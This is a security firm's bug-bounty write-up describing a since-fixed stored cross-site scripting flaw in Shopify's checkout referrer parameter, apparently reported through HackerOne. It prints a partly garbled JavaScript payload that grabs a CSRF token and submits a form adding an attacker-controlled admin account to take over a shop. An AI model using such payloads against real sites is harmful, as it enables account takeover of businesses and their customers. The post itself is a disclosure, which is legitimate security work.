How we tookover shopify accounts with one single click



How we tookover shopify accounts with one single click

To keep up with the security companies we often spend some time on bug bounties. That was a very boring weekend till we found out that Shopify has published their bbp on hackerone. By the time i turned back and forth all my teammates were plugged in. We found many cool vulnerabilities like privilege escalation, a few xss’s and a Oauth redirect bypass.

In this blog post I am going to show you guys how I used a persistent cross site scripting to takeover shops. This vulnerability can be easily exploited and any customer/User can takeover the shop.

When a customer purchases any product from a shop in shopify, they will be redirected to a checkout page. While redirected the request is sent with two other parameters. In those two parameters there is an interesting parameter called referrer. This referrer parameter tracks the customers , for example if there is a “buy now” button embedded on and a customer clicks on it to buy a product then this referrer value is reflected in the admin panel of the shop as shown in the screenshot below.

So to takeover the shop, a customer has to simply purchase a product from this address with the referrer parameter set to payload



To make it more fun , We wrote a code to add admins on every click. This way one could takeover a shop!

PS: After reporting this vulnerability shopify has started using CSP , as an extra measure to protect their customers from these kind of vulnerabilities. With CSP it isn’t possible to execute inline script.


var xhr = new XMLHttpRequest();"GET", "", false);
var token = xhr.responseText;
var pos = token.indexOf("csrf-param");
document.write("<html><body><form action= '' method='POST'>
<input type='hidden' name='utf8' value='â&#156;&#147;'>
<input type='hidden' name='authenticity&#95;token' value='"+token+"'/>
<input type='hidden' name='user&#91;first&#95;name&#93;' value='hacked' />
<input type='hidden' name='user&#91;last&#95;name&#93;' value='hacked'>
<input type='hidden' name='user&#91;email&#93;' value='example&#43;hacked&#64;hotmail&#46;com' />
<input type='hidden' name='&#95;method' value='post'>
<input type='submit' value='Submit form'></form>


We reported this vulnerability to Shopify via hackerone. This vulnerability is fixed now and cannot be reproduced.

Shopify rewarded us with a decent bounty , which made our next weekend really amazing.


  • Vimal Nair

    We are extremely pleased with the results of Secure Source Code Auditing service

  • Ben Johnson

    WSA solved our security problems through their solution CAINS.

Free Risk Report

Learn your business’s risk of a cyber attack and help you secure your application

Yes Send Me My Report

Share this story: